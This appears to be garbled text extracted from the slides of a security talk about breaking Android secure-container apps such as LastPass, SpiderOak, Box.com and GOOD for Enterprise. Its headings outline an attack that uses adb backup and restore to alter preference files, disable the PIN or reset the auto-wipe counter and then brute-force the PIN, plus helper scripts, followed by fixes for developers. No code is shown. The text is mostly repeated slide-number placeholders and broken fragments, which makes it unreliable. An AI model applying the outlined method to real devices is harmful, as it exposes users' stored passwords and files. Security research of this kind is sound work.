
Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253



We get

tries10000








PROFIT


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253








PROFIT


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253




PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

